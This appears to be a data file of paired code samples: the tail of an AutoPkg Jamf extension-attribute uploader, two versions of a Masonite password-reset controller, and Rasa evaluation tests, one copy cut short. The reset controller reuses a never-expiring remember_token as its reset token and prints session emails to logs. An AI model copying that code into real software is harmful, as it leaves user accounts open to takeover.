                    curl_cmd.extend(["--upload-file", data])
                else:
                    # slack requires data argument
                    curl_cmd.extend(["--data", data])
            # uapi and slack accepts json, classic API only accepts xml
            if "JSSResource" in url:
                curl_cmd.extend(["--header", "Content-type: application/xml"])
            else:
                curl_cmd.extend(["--header", "Content-type: application/json"])
        else:
            self.output(f"WARNING: HTTP method {method} not supported")
        # write session for jamf requests: persist any load-balancer cookie
        # (APBALANCEID / AWSALB) from the previous response so that retries
        # hit the same cluster node
        if "uapi" in url or "JSSResource" in url or "dbfileupload" in url:
            try:
                with open(headers_file, "r") as file:
                    headers = file.readlines()
                existing_headers = [x.strip() for x in headers]
                for header in existing_headers:
                    if "APBALANCEID" in header or "AWSALB" in header:
                        with open(cookie_jar, "w") as fp:
                            fp.write(header)
            except IOError:
                # no previous response headers - first request of the session
                pass
            # look for existing session
            try:
                with open(cookie_jar, "r") as file:
                    headers = file.readlines()
                existing_headers = [x.strip() for x in headers]
                for header in existing_headers:
                    if "APBALANCEID" in header or "AWSALB" in header:
                        cookie = header.split()[1].rstrip(";")
                        self.output(f"Existing cookie found: {cookie}", verbose_level=2)
                        curl_cmd.extend(["--cookie", cookie])
            except IOError:
                self.output(
                    "No existing cookie found - starting new session", verbose_level=2
                )
        # additional headers for advanced requests
        if additional_headers:
            curl_cmd.extend(additional_headers)
        self.output(f"curl command: {' '.join(curl_cmd)}", verbose_level=3)
        # now subprocess the curl command and build the r tuple which contains the
        # headers, status code and outputted data
        subprocess.check_output(curl_cmd)
        r = namedtuple(
            "r", ["headers", "status_code", "output"], defaults=(None, None, None)
        )
        # NOTE(review): the values below are assigned onto the namedtuple
        # *class*, shadowing its field descriptors, so the instance created by
        # `r()` at the end exposes them - quirky but functional
        try:
            with open(headers_file, "r") as file:
                headers = file.readlines()
            r.headers = [x.strip() for x in headers]
            for header in r.headers:  # pylint: disable=not-an-iterable
                # first non-"100 Continue" status line wins
                if re.match(r"HTTP/(1.1|2)", header) and "Continue" not in header:
                    r.status_code = int(header.split()[1])
        except IOError:
            raise ProcessorError(f"WARNING: {headers_file} not found")
        if os.path.exists(output_file) and os.path.getsize(output_file) > 0:
            with open(output_file, "rb") as file:
                if "uapi" in url:
                    # uapi responses are JSON; json.load accepts the binary file
                    r.output = json.load(file)
                else:
                    r.output = file.read()
        else:
            self.output(f"No output from request ({output_file} not found or empty)")
        return r()

    # do not edit directly - copy from template
    def status_check(self, r, endpoint_type, obj_name):
        """Return a message dependent on the HTTP response.

        Returns the string "break" on success (200/201) so callers can exit
        their retry loop; raises ProcessorError on 409 (conflict) or 401
        (permissions); otherwise logs a warning and returns None.
        """
        if r.status_code == 200 or r.status_code == 201:
            self.output(f"{endpoint_type} '{obj_name}' uploaded successfully")
            return "break"
        elif r.status_code == 409:
            self.output(r.output, verbose_level=2)
            raise ProcessorError(
                f"WARNING: {endpoint_type} '{obj_name}' upload failed due to a conflict"
            )
        elif r.status_code == 401:
            raise ProcessorError(
                f"ERROR: {endpoint_type} '{obj_name}' upload failed due to permissions error"
            )
        else:
            self.output(f"WARNING: {endpoint_type} '{obj_name}' upload failed")
            self.output(r.output, verbose_level=2)

    # do not edit directly - copy from template
    def get_path_to_file(self, filename):
        """AutoPkg is not very good at finding dependent files. This function
        will look inside the search directories for any supplied file.

        Searches the recipe/override directory first, then the repositories
        containing any parent recipes. Returns the matched path, or None
        (implicitly) when the file cannot be found anywhere.
        """
        # if the supplied file is not a path, use the override directory or
        # recipe dir if no override
        recipe_dir = self.env.get("RECIPE_DIR")
        filepath = os.path.join(recipe_dir, filename)
        if os.path.exists(filepath):
            self.output(f"File found at: {filepath}")
            return filepath
        # if not found, search parent directories to look for it
        if self.env.get("PARENT_RECIPES"):
            # also look in the repos containing the parent recipes.
            parent_recipe_dirs = list(
                {os.path.dirname(item) for item in self.env["PARENT_RECIPES"]}
            )
            matched_filepath = ""
            for d in parent_recipe_dirs:
                # check if we are in the root of a parent repo, if not, ascend to the root
                # note that if the parents are not in a git repo, only the same
                # directory as the recipe will be searched for templates
                if not os.path.isdir(os.path.join(d, ".git")):
                    d = os.path.dirname(d)
                for path in Path(d).rglob(filename):
                    matched_filepath = str(path)
                    break
            if matched_filepath:
                self.output(f"File found at: {matched_filepath}")
                return matched_filepath

    # do not edit directly - copy from template
    def check_api_obj_id_from_name(self, jamf_url, object_type, object_name, enc_creds):
        """check if a Classic API object with the same name exists on the server.

        Returns the object's numeric ID, 0 when no object of that name exists,
        or None (implicitly) when the listing request itself fails.
        """
        # define the relationship between the object types and their URL
        # we could make this shorter with some regex but I think this way is clearer
        object_types = {
            "package": "packages",
            "computer_group": "computergroups",
            "policy": "policies",
            "extension_attribute": "computerextensionattributes",
        }
        # keys of the JSON list returned by the Classic API per object type
        object_list_types = {
            "package": "packages",
            "computer_group": "computer_groups",
            "policy": "policies",
            "extension_attribute": "computer_extension_attributes",
        }
        url = f"{jamf_url}/JSSResource/{object_types[object_type]}"
        r = self.curl("GET", url, enc_creds)
        if r.status_code == 200:
            object_list = json.loads(r.output)
            self.output(
                object_list, verbose_level=4,
            )
            obj_id = 0
            for obj in object_list[object_list_types[object_type]]:
                self.output(
                    obj, verbose_level=3,
                )
                # we need to check for a case-insensitive match
                if obj["name"].lower() == object_name.lower():
                    obj_id = obj["id"]
            return obj_id

    # do not edit directly - copy from template
    def substitute_assignable_keys(self, data, xml_escape=False):
        """substitutes any key in the inputted text using the %MY_KEY% nomenclature.

        Replacement values come from the processor environment; set
        ``xml_escape`` when the result will be embedded in XML. Raises
        ProcessorError if a %KEY% has no corresponding env value.
        """
        # multiple passes (up to 5) so that substituted values which themselves
        # contain %KEY% markers are also resolved
        loop = 5
        while loop > 0:
            loop = loop - 1
            found_keys = re.findall(r"\%\w+\%", data)
            if not found_keys:
                break
            found_keys = [i.replace("%", "") for i in found_keys]
            for found_key in found_keys:
                if self.env.get(found_key):
                    # NOTE(review): this passes a tuple of two strings to
                    # self.output rather than a single message - presumably
                    # unintended; confirm against other processors
                    self.output(
                        (
                            f"Replacing any instances of '{found_key}' with",
                            f"'{str(self.env.get(found_key))}'",
                        ),
                        verbose_level=2,
                    )
                    if xml_escape:
                        replacement_key = escape(self.env.get(found_key))
                    else:
                        replacement_key = self.env.get(found_key)
                    data = data.replace(f"%{found_key}%", replacement_key)
                else:
                    self.output(f"WARNING: '{found_key}' has no replacement object!",)
                    raise ProcessorError("Unsubstitutable key in template found")
        return data

    def upload_ea(
        self, jamf_url, enc_creds, ea_name, script_path, obj_id=None,
    ):
        """Upload (POST) or update (PUT) a computer extension attribute.

        Reads the script from ``script_path``, substitutes %KEY% placeholders,
        wraps it in the Classic API XML payload and sends it, retrying up to
        5 times with a 10-second pause between attempts. Raises ProcessorError
        if the script is missing or the upload never succeeds.
        """
        # import script from file and replace any keys in the script
        if os.path.exists(script_path):
            with open(script_path, "r") as file:
                script_contents = file.read()
        else:
            raise ProcessorError("Script does not exist!")
        # substitute user-assignable keys
        script_contents = self.substitute_assignable_keys(script_contents)
        # XML-escape the script so it can be embedded in the payload
        script_contents_escaped = escape(script_contents)
        # build the object
        ea_data = (
            "<computer_extension_attribute>"
            + "<name>{}</name>".format(ea_name)
            + "<enabled>true</enabled>"
            + "<description/>"
            + "<data_type>String</data_type>"
            + "<input_type>"
            + "  <type>script</type>"
            + "  <platform>Mac</platform>"
            + "  <script>{}</script>".format(script_contents_escaped)
            + "</input_type>"
            + "<inventory_display>Extension Attributes</inventory_display>"
            + "<recon_display>Extension Attributes</recon_display>"
            + "</computer_extension_attribute>"
        )
        # if we find an object ID we put, if not, we post
        if obj_id:
            url = "{}/JSSResource/computerextensionattributes/id/{}".format(
                jamf_url, obj_id
            )
        else:
            url = "{}/JSSResource/computerextensionattributes/id/0".format(jamf_url)
        self.output(
            "Extension Attribute data:", verbose_level=2,
        )
        self.output(
            ea_data, verbose_level=2,
        )
        self.output("Uploading Extension Attribute..")
        # write the template to temp file (curl uploads from a file)
        template_xml = self.write_temp_file(ea_data)
        count = 0
        while True:
            count += 1
            self.output(
                "Extension Attribute upload attempt {}".format(count), verbose_level=2,
            )
            method = "PUT" if obj_id else "POST"
            r = self.curl(method, url, enc_creds, template_xml)
            # check HTTP response
            if self.status_check(r, "Extension Attribute", ea_name) == "break":
                break
            if count > 5:
                self.output(
                    "ERROR: Extension Attribute upload did not succeed after 5 attempts"
                )
                self.output("\nHTTP POST Response Code: {}".format(r.status_code))
                raise ProcessorError("ERROR: Extension Attribute upload failed ")
            sleep(10)
        # clean up temp files
        self.clear_tmp_dir()

    def main(self):
        """Do the main thing here.

        Reads the processor inputs, checks whether the named Extension
        Attribute already exists on the server, uploads or replaces it as
        configured, and records a summary in the processor environment.
        """
        self.jamf_url = self.env.get("JSS_URL")
        self.jamf_user = self.env.get("API_USERNAME")
        self.jamf_password = self.env.get("API_PASSWORD")
        self.ea_script_path = self.env.get("ea_script_path")
        self.ea_name = self.env.get("ea_name")
        self.replace = self.env.get("replace_ea")
        # handle setting replace in overrides (plist values may arrive as the
        # string "False" rather than a boolean)
        if not self.replace or self.replace == "False":
            self.replace = False
        # clear any pre-existing summary result
        if "jamfextensionattributeuploader_summary_result" in self.env:
            del self.env["jamfextensionattributeuploader_summary_result"]
        ea_uploaded = False
        # encode the username and password into a basic auth b64 encoded string
        credentials = f"{self.jamf_user}:{self.jamf_password}"
        enc_creds_bytes = b64encode(credentials.encode("utf-8"))
        enc_creds = str(enc_creds_bytes, "utf-8")
        # handle files with no path: search the recipe/parent-recipe dirs
        if "/" not in self.ea_script_path:
            found_template = self.get_path_to_file(self.ea_script_path)
            if found_template:
                self.ea_script_path = found_template
            else:
                raise ProcessorError(f"ERROR: EA file {self.ea_script_path} not found")
        # now start the process of uploading the object
        self.output(f"Checking for existing '{self.ea_name}' on {self.jamf_url}")
        # check for existing - requires obj_name
        obj_type = "extension_attribute"
        obj_id = self.check_api_obj_id_from_name(
            self.jamf_url, obj_type, self.ea_name, enc_creds
        )
        if obj_id:
            self.output(
                "Extension Attribute '{}' already exists: ID {}".format(
                    self.ea_name, obj_id
                )
            )
            if self.replace:
                self.output(
                    "Replacing existing Extension Attribute as 'replace_ea' is set to {}".format(
                        self.replace
                    ),
                    verbose_level=1,
                )
                self.upload_ea(
                    self.jamf_url, enc_creds, self.ea_name, self.ea_script_path, obj_id,
                )
                ea_uploaded = True
            else:
                self.output(
                    "Not replacing existing Extension Attribute. Use replace_ea='True' to enforce.",
                    verbose_level=1,
                )
                return
        else:
            # post the item
            self.upload_ea(
                self.jamf_url, enc_creds, self.ea_name, self.ea_script_path,
            )
            ea_uploaded = True
        # output the summary
        self.env["extension_attribute"] = self.ea_name
        self.env["ea_uploaded"] = ea_uploaded
        if ea_uploaded:
            self.env["jamfextensionattributeuploader_summary_result"] = {
                "summary_text": (
                    "The following extension attributes were created or "
                    "updated in Jamf Pro:"
                ),
                "report_fields": ["name", "path"],
                "data": {"name": self.ea_name, "path": self.ea_script_path},
            }
if __name__ == "__main__":
    # Instantiate the processor and hand control to AutoPkg's CLI driver.
    PROCESSOR = JamfExtensionAttributeUploader()
    PROCESSOR.execute_shell()
|
"""A PasswordController Module."""
import uuid
from masonite import env, Mail, Session
from masonite.auth import Auth
from masonite.helpers import config, password as bcrypt_password
from masonite.request import Request
from masonite.view import View
from masonite.validation import Validator
from config.auth import AUTH
class PasswordController:
    """Password Controller.

    Handles the forgotten-password flow: rendering the request/reset forms,
    emailing a reset link tied to the user's ``remember_token``, and storing
    the new password hash.
    """

    def forget(self, view: View, auth: Auth):
        """Render the "forgot password" form."""
        return view.render("auth/forget", {"app": config("application"), "Auth": auth})

    def reset(self, view: View, request: Request, auth: Auth):
        """Render the reset form when the URL token matches a user's remember_token.

        Returns None (no view) when the token is unknown.
        """
        token = request.param("token")
        user = AUTH["guards"]["web"]["model"].where("remember_token", token).first()
        if user:
            return view.render(
                "auth/reset",
                {"token": token, "app": config("application"), "Auth": auth},
            )

    def send(self, request: Request, session: Session, mail: Mail, validate: Validator):
        """Validate the submitted email and send a password-reset link if it matches a user.

        Always flashes the same success message and redirects, so the response
        does not reveal whether the address exists.
        """
        # BUG FIX: the inner quotes of this f-string reused the outer single
        # quotes ({request.session.get('email')}), which is a SyntaxError on
        # Python < 3.12. NOTE(review): leftover debug print - consider removing.
        print(f' session email: {request.session.get("email")}')
        errors = request.validate(
            validate.required("email"),
            validate.email("email", messages={'email': "Emailová adresa nie je platná"})
        )
        print(f' errors: {errors}')
        if errors:
            return request.back().with_errors(errors)
        email = request.input("email")
        user = AUTH["guards"]["web"]["model"].where("email", email).first()
        if user:
            # issue a token only once so previously mailed links stay valid
            if not user.remember_token:
                user.remember_token = str(uuid.uuid4())
                user.save()
            # NOTE(review): `message` is computed but unused since the plain-text
            # send below was replaced by the templated mail
            message = "Prosím, kliknite na {}/password/{}/reset pre zresetovanie hesla".format(
                env("APP_URL"), user.remember_token
            )
            link = "{}/password/{}/reset".format(
                env("APP_URL"), user.remember_token)
            # mail.subject("Inštrukcie pre zresetovanie hesla").to(user.email).send(message)
            mail.to(user.email).template(
                "email/password_reset", {"name": user.name, "email": user.email, "link": link}
            ).subject("Inštrukcie pre zresetovanie hesla").send()
        session.flash(
            "success",
            #"If we found that email in our system then the email has been sent. Please follow the instructions in the email to reset your password.",
            "Ak emailová adresa existuje v našom systéme, email bol odoslaný."
            "Pre resetovanie hesla prosím postupujte podľa inštrukcií uvedených v emaili."
        )
        return request.redirect("/password")

    def update(self, request: Request, validate: Validator):
        """Validate the new password, hash it and save it for the token's user."""
        errors = request.validate(
            validate.required("password"),
            # TODO: only available in masonite latest versions (which are not compatible with Masonite 2.2)
            validate.strong(
                "password",
                length=8,
                special=1,
                uppercase=1,
                # breach=True checks if the password has been breached before.
                # Requires 'pip install pwnedapi'
                breach=False,
                messages={
                    'password': 'Heslo musí obsahovať minimálne 8 znakov, jeden špeciálny znak, jedno veľké písmeno a dve číslice'
                }
            ),
        )
        if errors:
            return request.back().with_errors(errors)
        user = (
            AUTH["guards"]["web"]["model"]
            .where("remember_token", request.param("token"))
            .first()
        )
        if user:
            user.password = bcrypt_password(request.input("password"))
            user.save()
        return request.redirect("/login")
| """A PasswordController Module."""
import uuid
from masonite import env, Mail, Session
from masonite.auth import Auth
from masonite.helpers import config, password as bcrypt_password
from masonite.request import Request
from masonite.view import View
from masonite.validation import Validator
from config.auth import AUTH
class PasswordController:
    """Password Controller.

    Implements the forgotten-password flow: request form, reset form,
    reset-link email, and the final password update.
    """

    def forget(self, view: View, auth: Auth):
        """Show the forgotten-password form."""
        context = {"app": config("application"), "Auth": auth}
        return view.render("auth/forget", context)

    def reset(self, view: View, request: Request, auth: Auth):
        """Show the reset form if the URL token belongs to a known user."""
        reset_token = request.param("token")
        model = AUTH["guards"]["web"]["model"]
        account = model.where("remember_token", reset_token).first()
        if not account:
            return
        return view.render(
            "auth/reset",
            {"token": reset_token, "app": config("application"), "Auth": auth},
        )

    def send(self, request: Request, session: Session, mail: Mail, validate: Validator):
        """Email a password-reset link when the submitted address matches a user."""
        print(f' session email: {request.session.get("email")}')
        failures = request.validate(
            validate.required("email"),
            validate.email("email", messages={'email': "Emailová adresa nie je platná"})
        )
        print(f' errors: {failures}')
        if failures:
            return request.back().with_errors(failures)
        submitted_email = request.input("email")
        account = AUTH["guards"]["web"]["model"].where("email", submitted_email).first()
        if account:
            # create a token only if the user does not already have one
            if not account.remember_token:
                account.remember_token = str(uuid.uuid4())
                account.save()
            # kept for parity with the commented-out plain-text send below
            message = "Prosím, kliknite na {}/password/{}/reset pre zresetovanie hesla".format(
                env("APP_URL"), account.remember_token
            )
            link = "{}/password/{}/reset".format(env("APP_URL"), account.remember_token)
            # mail.subject("Inštrukcie pre zresetovanie hesla").to(user.email).send(message)
            outgoing = mail.to(account.email)
            outgoing = outgoing.template(
                "email/password_reset",
                {"name": account.name, "email": account.email, "link": link}
            )
            outgoing.subject("Inštrukcie pre zresetovanie hesla").send()
        session.flash(
            "success",
            #"If we found that email in our system then the email has been sent. Please follow the instructions in the email to reset your password.",
            "Ak emailová adresa existuje v našom systéme, email bol odoslaný."
            "Pre resetovanie hesla prosím postupujte podľa inštrukcií uvedených v emaili."
        )
        return request.redirect("/password")

    def update(self, request: Request, validate: Validator):
        """Validate and persist the new password for the token's user."""
        failures = request.validate(
            validate.required("password"),
            # TODO: only available in masonite latest versions (which are not compatible with Masonite 2.2)
            validate.strong(
                "password",
                length=8,
                special=1,
                uppercase=1,
                # breach=True checks if the password has been breached before.
                # Requires 'pip install pwnedapi'
                breach=False,
                messages={
                    'password': 'Heslo musí obsahovať minimálne 8 znakov, jeden špeciálny znak, jedno veľké písmeno a dve číslice'
                }
            ),
        )
        if failures:
            return request.back().with_errors(failures)
        model = AUTH["guards"]["web"]["model"]
        account = model.where("remember_token", request.param("token")).first()
        if account:
            account.password = bcrypt_password(request.input("password"))
            account.save()
        return request.redirect("/login")
|
import os
from pathlib import Path
import json
import logging
from typing import Any, Text, Dict
import pytest
import rasa.shared.utils.io
import rasa.utils.io
from rasa.core.test import (
_create_data_generator,
_collect_story_predictions,
test as evaluate_stories,
FAILED_STORIES_FILE,
CONFUSION_MATRIX_STORIES_FILE,
REPORT_STORIES_FILE,
SUCCESSFUL_STORIES_FILE,
_clean_entity_results,
)
from rasa.core.policies.memoization import MemoizationPolicy
# we need this import to ignore the warning...
# noinspection PyUnresolvedReferences
from rasa.nlu.test import evaluate_entities, run_evaluation
from rasa.core.agent import Agent
from tests.core.conftest import (
DEFAULT_STORIES_FILE,
E2E_STORY_FILE_UNKNOWN_ENTITY,
END_TO_END_STORY_FILE,
E2E_STORY_FILE_TRIPS_CIRCUIT_BREAKER,
STORY_FILE_TRIPS_CIRCUIT_BREAKER,
)
async def test_evaluation_file_creation(tmpdir: Path, default_agent: Agent):
    """Evaluating with errors/successes enabled writes every report file."""
    expected_outputs = [
        FAILED_STORIES_FILE,
        SUCCESSFUL_STORIES_FILE,
        REPORT_STORIES_FILE,
        CONFUSION_MATRIX_STORIES_FILE,
    ]
    await evaluate_stories(
        stories=DEFAULT_STORIES_FILE,
        agent=default_agent,
        out_directory=str(tmpdir),
        max_stories=None,
        e2e=False,
        errors=True,
        successes=True,
    )
    for file_name in expected_outputs:
        assert os.path.isfile(str(tmpdir / file_name))
async def test_end_to_end_evaluation_script(default_agent: Agent):
    """E2E evaluation of the default stories yields the exact expected store."""
    generator = await _create_data_generator(
        END_TO_END_STORY_FILE, default_agent, use_e2e=True
    )
    completed_trackers = generator.generate_story_trackers()
    story_evaluation, num_stories, _ = await _collect_story_predictions(
        completed_trackers, default_agent, use_e2e=True
    )
    # expected serialised evaluation store: presumably action targets first,
    # then intent targets, then the entity target - confirm against
    # EvaluationStore.serialise if this ordering changes
    serialised_store = [
        "utter_greet",
        "action_listen",
        "utter_greet",
        "action_listen",
        "utter_default",
        "action_listen",
        "utter_goodbye",
        "action_listen",
        "utter_greet",
        "action_listen",
        "utter_default",
        "action_listen",
        "greet",
        "greet",
        "default",
        "goodbye",
        "greet",
        "default",
        '[{"name": "Max"}]{"entity": "name", "value": "Max"}',
    ]
    assert story_evaluation.evaluation_store.serialise()[0] == serialised_store
    assert not story_evaluation.evaluation_store.has_prediction_target_mismatch()
    assert len(story_evaluation.failed_stories) == 0
    assert num_stories == 3
async def test_end_to_end_evaluation_script_unknown_entity(default_agent: Agent):
    """A story with an unknown entity must register as a single failed story."""
    generator = await _create_data_generator(
        E2E_STORY_FILE_UNKNOWN_ENTITY, default_agent, use_e2e=True
    )
    trackers = generator.generate_story_trackers()
    evaluation, story_count, _ = await _collect_story_predictions(
        trackers, default_agent, use_e2e=True
    )
    assert evaluation.evaluation_store.has_prediction_target_mismatch()
    assert len(evaluation.failed_stories) == 1
    assert story_count == 1
@pytest.mark.timeout(300)
async def test_end_to_evaluation_with_forms(form_bot_agent: Agent):
    """Form happy-path e2e stories are predicted without any mismatch."""
    generator = await _create_data_generator(
        "data/test_evaluations/form_end_to_end_stories.yml",
        form_bot_agent,
        use_e2e=True,
    )
    trackers = generator.generate_story_trackers()
    evaluation, _, _ = await _collect_story_predictions(
        trackers, form_bot_agent, use_e2e=True
    )
    assert not evaluation.evaluation_store.has_prediction_target_mismatch()
async def test_source_in_failed_stories(tmpdir: Path, default_agent: Agent):
    """The failed-stories report must name the source file of each failed story."""
    report_path = str(tmpdir / FAILED_STORIES_FILE)
    await evaluate_stories(
        stories=E2E_STORY_FILE_UNKNOWN_ENTITY,
        agent=default_agent,
        out_directory=str(tmpdir),
        max_stories=None,
        e2e=False,
    )
    story_source = Path(E2E_STORY_FILE_UNKNOWN_ENTITY).absolute()
    report_text = rasa.shared.utils.io.read_file(report_path)
    expected_line = f"story: simple_story_with_unknown_entity ({story_source})"
    assert expected_line in report_text
async def test_end_to_evaluation_trips_circuit_breaker():
    """A story that loops on the same action should trip the circuit breaker."""
    agent = Agent(
        domain="data/test_domains/default.yml",
        policies=[MemoizationPolicy(max_history=11)],
    )
    training_data = await agent.load_data(STORY_FILE_TRIPS_CIRCUIT_BREAKER)
    agent.train(training_data)
    generator = await _create_data_generator(
        E2E_STORY_FILE_TRIPS_CIRCUIT_BREAKER, agent, use_e2e=True
    )
    trackers = generator.generate_story_trackers()
    evaluation, story_count, _ = await _collect_story_predictions(
        trackers, agent, use_e2e=True
    )
    # ten repeated greets before the breaker kicks in, then two breaker markers
    expected_predictions = ["utter_greet"] * 10 + ["circuit breaker tripped"] * 2
    assert evaluation.evaluation_store.action_predictions == expected_predictions
    assert story_count == 1
@pytest.mark.parametrize(
    "text, entity, expected_entity",
    [
        # Duckling: numeric value is normalised to a string
        (
            "The first one please.",
            {
                "extractor": "DucklingEntityExtractor",
                "entity": "ordinal",
                "confidence": 0.87,
                "start": 4,
                "end": 9,
                "value": 1,
            },
            {
                "text": "The first one please.",
                "entity": "ordinal",
                "start": 4,
                "end": 9,
                "value": "1",
            },
        ),
        # CRF: value already a string, passes through
        (
            "The first one please.",
            {
                "extractor": "CRFEntityExtractor",
                "entity": "ordinal",
                "confidence": 0.87,
                "start": 4,
                "end": 9,
                "value": "1",
            },
            {
                "text": "The first one please.",
                "entity": "ordinal",
                "start": 4,
                "end": 9,
                "value": "1",
            },
        ),
        # DIET: string value, extractor/confidence stripped from result
        (
            "Italian food",
            {
                "extractor": "DIETClassifier",
                "entity": "cuisine",
                "confidence": 0.99,
                "start": 0,
                "end": 7,
                "value": "Italian",
            },
            {
                "text": "Italian food",
                "entity": "cuisine",
                "start": 0,
                "end": 7,
                "value": "Italian",
            },
        ),
    ],
)
def test_event_has_proper_implementation(
    text: Text, entity: Dict[Text, Any], expected_entity: Dict[Text, Any]
):
    """_clean_entity_results keeps positional fields, adds text, stringifies value."""
    actual_entities = _clean_entity_results(text, [entity])
    assert actual_entities[0] == expected_entity
@pytest.mark.timeout(600)
@pytest.mark.parametrize(
    "test_file",
    [
        ("data/test_yaml_stories/test_full_retrieval_intent_story.yml"),
        ("data/test_yaml_stories/test_base_retrieval_intent_story.yml"),
    ],
)
async def test_retrieval_intent(response_selector_agent: Agent, test_file: Text):
    """A test story may name either the base intent or the full retrieval intent."""
    generator = await _create_data_generator(
        test_file, response_selector_agent, use_e2e=True,
    )
    trackers = generator.generate_story_trackers()
    evaluation, _, _ = await _collect_story_predictions(
        trackers, response_selector_agent, use_e2e=True
    )
    assert not evaluation.evaluation_store.has_prediction_target_mismatch()
@pytest.mark.parametrize(
    "test_file",
    [
        ("data/test_yaml_stories/test_full_retrieval_intent_wrong_prediction.yml"),
        ("data/test_yaml_stories/test_base_retrieval_intent_wrong_prediction.yml"),
    ],
)
async def test_retrieval_intent_wrong_prediction(
    tmpdir: Path, response_selector_agent: Agent, test_file: Text
):
    """Wrong retrieval predictions are reported with the full retrieval intent."""
    report_path = str(tmpdir / FAILED_STORIES_FILE)
    await evaluate_stories(
        stories=test_file,
        agent=response_selector_agent,
        out_directory=str(tmpdir),
        max_stories=None,
        e2e=True,
    )
    report_text = rasa.shared.utils.io.read_file(report_path)
    # the predicted entry must contain the full retrieval intent name
    assert "# predicted: chitchat/ask_name" in report_text
@pytest.mark.timeout(240)
async def test_e2e_with_entity_evaluation(e2e_bot_agent: Agent, tmp_path: Path):
    """E2E evaluation writes per-entity metric reports and an errors file."""
    test_file = "data/test_e2ebot/tests/test_stories.yml"
    await evaluate_stories(
        stories=test_file,
        agent=e2e_bot_agent,
        out_directory=str(tmp_path),
        max_stories=None,
        e2e=True,
    )
    report = rasa.shared.utils.io.read_json_file(tmp_path / "TEDPolicy_report.json")
    # 'name' entity: the single occurrence is predicted correctly
    assert report["name"] == {
        "precision": 1.0,
        "recall": 1.0,
        "f1-score": 1.0,
        "support": 1,
        "confused_with": {},
    }
    # 'mood' entity: one of the two occurrences is missed (recall 0.5)
    assert report["mood"] == {
        "precision": 1.0,
        "recall": 0.5,
        "f1-score": 0.6666666666666666,
        "support": 2,
        "confused_with": {},
    }
    errors = rasa.shared.utils.io.read_json_file(tmp_path / "TEDPolicy_errors.json")
    assert len(errors) == 1
    assert errors[0]["text"] == "today I was very cranky"
@pytest.mark.parametrize(
    "stories_yaml,expected_results",
    [
        [
            # three stories; story3's final utter_default is mispredicted,
            # producing the partial action_listen recall below
            """
            stories:
            - story: story1
              steps:
              - intent: greet
              - action: utter_greet
            - story: story2
              steps:
              - intent: goodbye
              - action: utter_goodbye
            - story: story3
              steps:
              - intent: greet
              - action: utter_greet
              - intent: goodbye
              - action: utter_default
            """,
            {
                "utter_goodbye": {
                    "precision": 1.0,
                    "recall": 1.0,
                    "f1-score": 1.0,
                    "support": 1,
                },
                "action_listen": {
                    "precision": 1.0,
                    "recall": 0.75,
                    "f1-score": 0.8571428571428571,
                    "support": 4,
                },
                "utter_greet": {
                    "precision": 1.0,
                    "recall": 1.0,
                    "f1-score": 1.0,
                    "support": 2,
                },
                "utter_default": {
                    "precision": 0.0,
                    "recall": 0.0,
                    "f1-score": 0.0,
                    "support": 1,
                },
                "micro avg": {
                    "precision": 1.0,
                    "recall": 0.75,
                    "f1-score": 0.8571428571428571,
                    "support": 8,
                },
                "macro avg": {
                    "precision": 0.75,
                    "recall": 0.6875,
                    "f1-score": 0.7142857142857143,
                    "support": 8,
                },
                "weighted avg": {
                    "precision": 0.875,
                    "recall": 0.75,
                    "f1-score": 0.8035714285714286,
                    "support": 8,
                },
                # 2 of the 3 stories are predicted end-to-end correctly
                "conversation_accuracy": {
                    "accuracy": 2.0 / 3.0,
                    "total": 3,
                    "correct": 2,
                },
            },
        ],
    ],
)
async def test_story_report(
    tmpdir: Path,
    core_agent: Agent,
    stories_yaml: Text,
    expected_results: Dict[Text, Dict[Text, Any]],
) -> None:
    """Check story_report.json file contains correct result keys/values."""
    stories_path = tmpdir / "stories.yml"
    stories_path.write_text(stories_yaml, "utf8")
    out_directory = tmpdir / "results"
    out_directory.mkdir()
    await evaluate_stories(stories_path, core_agent, out_directory=out_directory)
    story_report_path = out_directory / "story_report.json"
    assert story_report_path.exists()
    actual_results = json.loads(story_report_path.read_text("utf8"))
    assert actual_results == expected_results
async def test_story_report_with_empty_stories(
    tmpdir: Path, core_agent: Agent,
) -> None:
    """An empty stories file still produces a story report - an empty one."""
    stories_file = tmpdir / "stories.yml"
    stories_file.write_text("", "utf8")
    results_dir = tmpdir / "results"
    results_dir.mkdir()
    await evaluate_stories(stories_file, core_agent, out_directory=results_dir)
    report_file = results_dir / "story_report.json"
    assert report_file.exists()
    assert json.loads(report_file.read_text("utf8")) == {}
@pytest.mark.parametrize(
    "skip_field,skip_value",
    [
        [None, None,],
        ["precision", None,],
        ["f1", None,],
        ["in_training_data_fraction", None,],
        ["report", None,],
        ["include_report", False,],
    ],
)
def test_log_evaluation_table(caplog, skip_field, skip_value):
    """Check that _log_evaluation_table correctly omits/includes optional args.

    Fix: the assertions reused double quotes for dict subscripts inside
    double-quoted f-strings (e.g. ``f"...{kwargs["f1"]}..."``), which is a
    SyntaxError on Python < 3.12 (quote reuse was only allowed by PEP 701).
    Single-quoted keys restore compatibility without changing behavior.
    """
    arr = [1, 1, 1, 0]
    acc = 0.75
    kwargs = {
        "precision": 0.5,
        "f1": 0.6,
        "in_training_data_fraction": 0.1,
        "report": {"macro f1": 0.7},
    }
    if skip_field:
        kwargs[skip_field] = skip_value
    caplog.set_level(logging.INFO)
    rasa.core.test._log_evaluation_table(arr, "CONVERSATION", acc, **kwargs)
    # the headline lines are always logged
    assert f"Correct: {int(len(arr) * acc)} / {len(arr)}" in caplog.text
    assert f"Accuracy: {acc:.3f}" in caplog.text
    # each optional metric appears unless it was the skipped field
    if skip_field != "f1":
        assert f"F1-Score: {kwargs['f1']:5.3f}" in caplog.text
    else:
        assert "F1-Score:" not in caplog.text
    if skip_field != "precision":
        assert f"Precision: {kwargs['precision']:5.3f}" in caplog.text
    else:
        assert "Precision:" not in caplog.text
    if skip_field != "in_training_data_fraction":
        assert (
            f"In-data fraction: {kwargs['in_training_data_fraction']:.3g}"
            in caplog.text
        )
    else:
        assert "In-data fraction:" not in caplog.text
    # the report is suppressed either by omitting it or via include_report=False
    if skip_field != "report" and skip_field != "include_report":
        assert f"Classification report: \n{kwargs['report']}" in caplog.text
    else:
        assert "Classification report:" not in caplog.text
| import os
from pathlib import Path
import json
import logging
from typing import Any, Text, Dict
import pytest
import rasa.shared.utils.io
import rasa.utils.io
from rasa.core.test import (
_create_data_generator,
_collect_story_predictions,
test as evaluate_stories,
FAILED_STORIES_FILE,
CONFUSION_MATRIX_STORIES_FILE,
REPORT_STORIES_FILE,
SUCCESSFUL_STORIES_FILE,
_clean_entity_results,
)
from rasa.core.policies.memoization import MemoizationPolicy
# we need this import to ignore the warning...
